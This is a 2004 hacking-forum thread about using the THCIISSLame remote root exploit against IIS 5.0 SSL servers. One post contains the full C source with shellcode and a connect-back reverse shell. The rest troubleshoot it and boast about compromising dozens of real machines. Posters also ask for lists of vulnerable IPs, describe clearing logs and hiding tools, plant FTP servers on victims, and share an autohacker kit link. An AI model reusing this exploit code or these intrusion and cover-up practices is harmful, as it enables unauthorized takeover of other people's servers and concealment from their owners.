Iis5 Ssl V0.2

Mux99

Apr 30 2004, 07:11 AM

QUOTE (onurize @ Apr 29 2004, 03:28 AM)

bind_error

help me plZ!

my Problem is the same. And it seems to me that many people have that problem.
So what can we do ???? version 0.1 works fine and i get a shell but with version 0.2 i always get bind errors.... I don´t know what i´m diong wrong...

Sorry for my bad englisch

BTW: This is the best security forum i ever senn on the web !!!!

Keep on Rockin !!

realloader

Apr 30 2004, 12:04 PM

I need Serv-u that work under Router!
ioftp may help , but i can not config it and start it, too difficult.
Ist there other FTP-Server which work under Router?

onurize

Apr 30 2004, 03:51 PM

@realloader use serv-u port : 21 or 80

t4ki0n

Apr 30 2004, 04:45 PM

post your vulnerable shellable ip's people!

realloader

Apr 30 2004, 06:38 PM

@onurize
Thank u verymuch!
I will test it.hope it work!

DeGast

Apr 30 2004, 06:49 PM

Try this exploit and it work.
Got already i few shells.

Thx you all

speCt0R

Apr 30 2004, 08:12 PM

thnx for the patch m8

KeeBLeR904

May 1 2004, 03:30 AM

QUOTE (Demsta @ Apr 25 2004, 04:00 AM)

QUOTE (SeNe @ Apr 23 2004, 10:54 PM)

u can download the patch from here PATCH ME and yes u can patch from CMD just google a bit and u will find the answer

cheers

, was looking for this the other day but i coulndt find it

has anyone else found the command line patch? ive been lookin for a bit but have come up dry.. any help would rock.. thanks

____________________________________________________-

in response to the poeple with the bind error.. i had those on some boxes.. but some gave me a shell on netcat

im not sure its supposed to do this but atleast its sucessful sometimes

mathofaka

May 1 2004, 04:17 AM

well so far i cought 13 people... try the people that have 5.0

KeeBLeR904

May 1 2004, 04:26 AM

QUOTE (whiterabitpus @ May 1 2004, 04:17 AM)

well so far i cought 13 people... try the people that have 5.0

did u secure them?

if so how? lol

Loxy

May 1 2004, 05:52 AM

Run the MS patch with the switches you wish. (wont actually fix the hole until reboot) : P

KeeBLeR904

May 1 2004, 06:05 AM

ahh thanks, you're the best

by the way.. to all the people that are not obeservant like me and didnt notice it at first.. after u click that link to ms's website

Security Update Information
click the plus sign by ^ to see the switches

EDIT

patchfilename /quiet /passive
worked like a charm

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] modded version by Ecko --> greetz to FireBlade, XeroX [*])

[*] Buffer is loading
[*] trying to get a connection...

No connection to SSL port 443!
Press any key to continue . . .

ty so much for ur help

KuRuPT

May 1 2004, 08:01 AM

I figured out the bind errors problem like someone else said. The problem is when you run nc.exe . you DO NOT need to run nc.exe along side this sploit. The sploit has nc built in and it runs it itself. so when you run nc.exe the port is open when the exploit tries to open another nc.exe on the same port causing bind errors.

mathofaka

May 2 2004, 05:38 AM

kurupt wen i connect to the person i send them nc.exe and it works find....and i secure them by clearing my logs and hidden32.exe thats about it

QUOTE

"computers are dominated by two kinds of people. those who know wa they are doing and those who do wa they dont know."

Demsta

May 2 2004, 05:45 AM

QUOTE (Mux99 @ Apr 30 2004, 07:11 AM)

QUOTE (onurize @ Apr 29 2004, 03:28 AM)

bind_error

help me plZ!

my Problem is the same. And it seems to me that many people have that problem.
So what can we do ???? version 0.1 works fine and i get a shell but with version 0.2 i always get bind errors.... I don´t know what i´m diong wrong...

Sorry for my bad englisch

BTW: This is the best security forum i ever senn on the web !!!!

Keep on Rockin !!

ffs.. how bout you try reading ALL the posts.. im sure youll find it.. tip.. version 1 you musnt of been using netcat

biohazard88

May 2 2004, 04:01 PM

Can someone mirror G777's autohacker?

ALL links are down at the moment!
Tnx

Edit:
Nother question, so to stop the bind thing just dont run netcat? Connectback port can be a random port i choose which is not in use on my machine right?
I'm only getting time outs at the moment...

onurize

May 2 2004, 10:11 PM

@Demsta i using netcat but it always say bind error

Mux99

May 2 2004, 10:40 PM

what´s going on ???

When I´m using net cat it says "bind error" and if i try the exploit without net cat i get the messgae "exploit failed may be firewalled" ???

I test it in my lan and no firewall is up I don´t understand it ????

onurize

May 2 2004, 10:56 PM

@mux99

same error

shiiiiit

JohnAcres

May 2 2004, 11:55 PM

like its said over and over in this thread u get the bind error because u have something else running on the port that u told THCIISSLame on... its prolly netcat... the bind error really means nothing just that it can't bind its own shell to that port so that if its going to work itll just connect to ur netcat u can use the exploits shell or u can use netcat or something else its all personal preference but its all doing the same thing

Mux99

May 3 2004, 08:44 AM

QUOTE (Mux99 @ May 2 2004, 10:40 PM)

what´s going on ???

When I´m using net cat it says "bind error" and if i try the exploit without net cat i get the messgae "exploit failed may be firewalled" ???

I test it in my lan and no firewall is up I don´t understand it ????

But,the both statements are full of contradictions. Because the first means that the exploit is working, but with an error.

And the other says the exploit doesen´t work at all. Exploit failed....Why ???

Waht am i doing wrong ???

biohazard88

May 3 2004, 09:38 AM

Indeed, can someone explain WHAT TO DO EXACTLY?
Cause i'm not getting any shells. With Netcat it's bind errors. What is THE RIGHT way?

Killaloop

May 3 2004, 10:10 AM

QUOTE (biohazard88 @ May 3 2004, 09:38 AM)

Indeed, can someone explain WHAT TO DO EXACTLY?
Cause i'm not getting any shells. With Netcat it's bind errors. What is THE RIGHT way?

should I really say it again?
well what ever has bind error todo with exploit failed maybe firewalled.
those are 2 complete differente exploits.
one with connect back shell
the other one opens a active port and tries to connect.
the one with the connectback shell listens forever for the shell. if you attach netcat to your port you will get the bind error which doesn't hurt because you will have the shell in the netcat window. by having netcat running autohacking with the connectback exploit is possible because it will only stop when you really got a shell in netcat and won't freeze at any ip.

the reason why you don't have any results is most webservers are to the risk factor of weaknesses within scripts firewalled or behind router. therefor the connectback version gives you about 80% higher chance to get a shell.
and because of heavy portscanning activity most servers are patched by now.

biohazard88

May 3 2004, 10:29 AM

Ok tnx for the nfo

Mux99

May 3 2004, 10:54 AM

@killaloop Thank You your statemaent really helped me

hottzo

May 3 2004, 11:24 AM

thx 4 the info, also use the patch to secure shell?

DougieShiney

May 3 2004, 12:05 PM

Bind error = THe exploit was unable to connect back to your system or netcat
Just means its firewalled in / out traffic on the system

This does work, if use netcat or not.

onurize

May 3 2004, 12:10 PM

problem part 2 guys...

I install serv-u but i cant connect what can i do ? some server has not a firewall its a router ... thx for answer...

Killaloop

May 3 2004, 12:15 PM

QUOTE (DougieShiney @ May 3 2004, 12:05 PM)

Bind error = THe exploit was unable to connect back to your system or netcat
Just means its firewalled in / out traffic on the system

This does work, if use netcat or not.

don't tell people stuff like this if you are not 100% sure it's right what you say. because this is absolutely WRONG. sorry not wanting to flame but you are 100% wrong (look at the exploit code)

bind error = exploit trys to open an passive listening socket on YOUR machine, which can't be opened because its already in use (by netcat or other apps) and has absolutely nothing todo with your target machine

QUOTE

problem part 2 guys...

I install serv-u but i cant connect what can i do ? some server has not a firewall its a router ... thx for answer...

if you aren't behind a proxy you have won 100 bugs, cause the router now is happy to have your ip.
you would need to forward your servu port which is not done without gaining access to the router itself. don't mess around just log off or find a standard port which is forwarded (21, 3389. 8080, 8081,81...)

el33t

May 3 2004, 01:06 PM

hi who can give me the active G777 gui link? all the above are offline, thanks..

onurize

May 3 2004, 01:30 PM

PM me @ el33t

biohazard88

May 3 2004, 02:37 PM

is 0.3 out?

Saw something about it?

Chans

May 3 2004, 03:13 PM

Yep it's out

QUOTE

/*****************************************************************************/
/* THCIISSLame 0.3 - IIS 5 SSL remote root exploit    */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)    */
/* THC PUBLIC SOURCE MATERIALS    */
/*    */
/* Bug was found by Internet Security Systems */
/* Reversing credits of the bug go to Halvar Flake    */
/*    */
/* compile with MS Visual C++ : cl THCIISSLame.c    */
/*    */
/* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
/* v0.2 - This little update uses a connectback shell ! */
/* v0.1 - First release with portbinding shell on 31337 */
/*    */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
/* scut, stealth, FtR and Random    */
/*****************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define jumper "\xeb\x0f"
#define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"

char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";

char shellcode[] =
"\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
"\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
"\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
"\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
"\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
"\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
"\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
"\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
"\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
"\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
"\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
"\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
"\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
"\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
"\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
"\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
"\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
"\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
"\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
"\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
"\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
"\x55\xe4";

void usage();
void shell(int sock);

int main(int argc, char *argv[])
{
unsigned int i,sock,sock2,sock3,addr,rc,len=16;
unsigned char *badbuf,*p;
unsigned long offset = 0x6741a1cd;
unsigned long XOR = 0xffffffff;
unsigned long XORIP = 0x93939393;
unsigned short XORPORT = 0x9393;

unsigned short cbport;
unsigned long cbip;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
printf("tested on Windows 2000 Server german/english SP4\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc<4 || argc>4)
   usage();

badbuf = malloc(352);
memset(badbuf,0,352);

printf("\n[*] building buffer\n");

p = badbuf;

memcpy(p,sslshit,sizeof(sslshit));

p+=sizeof(sslshit)-1;

strcat(p,jumper);

strcat(p,greetings_to_microsoft);

offset^=XOR;
strncat(p,(unsigned char *)&offset,4);

cbport = htons((unsigned short)atoi(argv[3]));
cbip = inet_addr(argv[2]);
cbport ^= XORPORT;
cbip ^= XORIP;
memcpy(&shellcode[2],&cbport,2);
memcpy(&shellcode[4],&cbip,4);

strcat(p,shellcode);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
   printf("WSAStartup failed !\n");
   exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
   addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
   printf("Unable to resolve %s\n",argv[1]);
   exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{
   printf("socket() error...\n");
   exit(-1);
}

if (hp != NULL)
   memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
   mytcp.sin_addr.s_addr = addr;

if (hp)
   mytcp.sin_family = hp->h_addrtype;
else
   mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(443);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,badbuf,351,0);
printf("[*] exploit send\n");

mytcp.sin_addr.s_addr = 0;
mytcp.sin_port=htons((unsigned short)atoi(argv[3]));

sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

rc=bind(sock2,(struct sockaddr *)&mytcp,16);
if(rc!=0)
{
   printf("bind error() %d\n",WSAGetLastError());
   exit(-1);
}

rc=listen(sock2,1);
if(rc!=0)
{
   printf("listen error()\n");
   exit(-1);
}

printf("[*] waiting for shell\n");
sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
if(sock3)
{
   printf("[*] Exploit successful ! Have fun !\n");
   printf("[*] --------------------------------------------------------------------\n\n");
   shell(sock3);
}
}
else
{
   printf("\nCan't connect to ssl port 443!\n");
   exit(-1);
}

shutdown(sock,1);
closesocket(sock);
shutdown(sock,2);
closesocket(sock2);
shutdown(sock,3);
closesocket(sock3);

free(badbuf);

exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{
   l = recv (sock, buf, sizeof (buf), 0);
   if (l <= 0)
   {
printf ("bye bye...\n");
return;
   }
l = write (1, buf, l);
   if (l <= 0)
   {
printf ("bye bye...\n");
return;
   }
}
else
{
   l = read (0, buf, sizeof (buf));
   if (l <= 0)
   {
printf("bye bye...\n");
return;
   }
   l = send(sock, buf, l, 0);
   if (l <= 0)
   {
printf("bye bye...\n");
return;
   }
}
}
}

biohazard88

May 3 2004, 04:29 PM

Again @ this release it says Waiting for shell all the time

onurize

May 3 2004, 06:25 PM

can someone compile this big thx to this one !

realloader

May 3 2004, 08:40 PM

Wenn i use NC it say:
THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
bind error() 10048

Wenn I dont use NC it say:
THCIISSLame v0.3 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell

All the time.

Help please!

onurize

May 3 2004, 08:43 PM

QUOTE (DougieShiney @ May 3 2004, 12:05 PM)
Bind error = THe exploit was unable to connect back to your system or netcat
Just means its firewalled in / out traffic on the system

This does work, if use netcat or not.

don't tell people stuff like this if you are not 100% sure it's right what you say. because this is absolutely WRONG. sorry not wanting to flame but you are 100% wrong (look at the exploit code)

bind error = exploit trys to open an passive listening socket on YOUR machine, which can't be opened because its already in use (by netcat or other apps) and has absolutely nothing todo with your target machine

QUOTE
problem part 2 guys...

I install serv-u but i cant connect what can i do ? some server has not a firewall its a router ... thx for answer...

if you aren't behind a proxy you have won 100 bugs, cause the router now is happy to have your ip.
you would need to forward your servu port which is not done without gaining access to the router itself. don't mess around just log off or find a standard port which is forwarded (21, 3389. 8080, 8081,81...)

CrowDat

May 3 2004, 11:20 PM

QUOTE (el33t @ May 3 2004, 01:06 PM)

hi who can give me the active G777 gui link? all the above are offline, thanks..

Try this http://62.22.9.163/banners/G777-IIS-SSL.RAR

SuGaR0

May 4 2004, 10:07 AM

hi guys
i dont know why u are not able to have a lot of shell.
personally in 3-4 days i have found about 70-80 shell with netcat.
Maybe some ranges have a lot of *nix machines and thats why u have bind error return.
well, if i want a universal patch for this bug (not by lenguage) is possible to find or make ?

greetz

EzMe

May 4 2004, 11:11 AM

If you scan using DSScan, then that should not be an problem. I also wound alot of vunrable server, alltought it becomes less and less....

onurize

May 4 2004, 12:03 PM

hey Guys i find lots of shells jet but i cant connect to him with flashfxp because router i scan with superscan all ports but nothing is open or is in use... no chance..

SuGaR0

May 4 2004, 12:10 PM

yes, my same problem ...
that's why you try to connect to the router/switch/pc ip adress ... and then im searching the metode to resolve the problem ... anyway .. with servu i must only change some settings ?

greetz

8XyuVmUB

May 4 2004, 02:18 PM

they all work but you need to find systems that are vulnerable

onurize

May 4 2004, 04:10 PM

find a shell is a small problem install serv-u and connect is a BIG Problem ....

roto

May 5 2004, 07:46 AM

thx for the autohacker, nice little app

realloader

May 5 2004, 03:43 PM

QUOTE (onurize @ May 4 2004, 04:10 PM)

find a shell is a small problem install serv-u and connect is a BIG Problem ....

Yes...Big Problem is to connect to serv-u!
It muss have a ftp server which under router!
Which one? and how to?

Gargoyle

May 5 2004, 05:22 PM

Can anyone compile the new exploit and offer us to download the exe ?
my C++ shows me 9 Errors

onurize

May 5 2004, 06:52 PM

i heard bulletproof goes tru router but the admin see it ... because your cant tarn it ...

securitydood

May 5 2004, 07:25 PM

QUOTE (Gargoyle @ May 5 2004, 05:22 PM)

Can anyone compile the new exploit and offer us to download the exe ?
my C++ shows me 9 Errors

check back a few pages m8 the exploit is in a kit that one of the generous guys on here did for us

http://62.22.9.163/banners/G777-IIS-SSL.RAR

compliments of Mr G777

(taken from page 13)

onurize

May 5 2004, 08:25 PM

Hey i found a way but it suxx to open a port ...